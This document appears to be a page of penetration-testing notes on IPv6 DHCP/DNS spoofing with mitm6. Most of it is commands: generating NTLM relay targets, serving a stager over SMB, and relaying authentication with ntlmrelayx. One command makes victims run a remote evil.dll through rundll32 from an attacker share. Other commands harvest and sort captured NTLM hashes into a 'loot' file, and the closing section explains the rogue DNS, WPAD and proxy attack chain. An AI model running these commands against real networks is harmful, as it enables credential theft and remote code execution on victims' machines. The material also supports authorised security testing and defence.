DHCPv6 Spoofing
Dynamic Host Configuration Protocol version 6
mitm6
Install:
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install
Or
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"
Generate a list of targets for NTLM relay and prepare a C2 listener and stager:
$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt
Start SMB server to capture NTLM hashes and serve the stager:
$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out
Get ready to relay authentication and try executing a command:
$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server
Start MitMing:
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
Parse, sort and save NTLM hashes:
# Users
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6
# Machines
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1
Attack vectors
Grab hashes with smbserver.py
(passive):
mitm6.py
poisons IPv6 DNS entries for all hosts in the/24
network.Victims start to use attacker's machine as the primary DNS server.
mitm6.py
on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries.smbserver.py
collects hashes during SMB requests from victims.
Relay authentication with ntlmrelayx.py (active):
mitm6.py
poisons IPv6 DNS entries for all hosts in the/24
network.Victims start to use attacker's machine as the primary DNS server.
mitm6.py
on the attacker's machine acts like a rogue DNS server,ntlmrelayx.py
serves a malicious WPAD file with an inexistent hostname (which will be resolved to the attacker's IP anyway) and acts like a rogue proxy server andmitm6.py
responds with the attacker's IP for all the incoming DNS queries.Victims grab the WPAD file and ask the rogue IPv6 DNS server (attacker's machine) to resolve its location - resolved to attacker's machine.
Victims go to the rogue proxy server and there
ntlmrelayx.py
responses withHTTP 407 Proxy Authentication
.
Last updated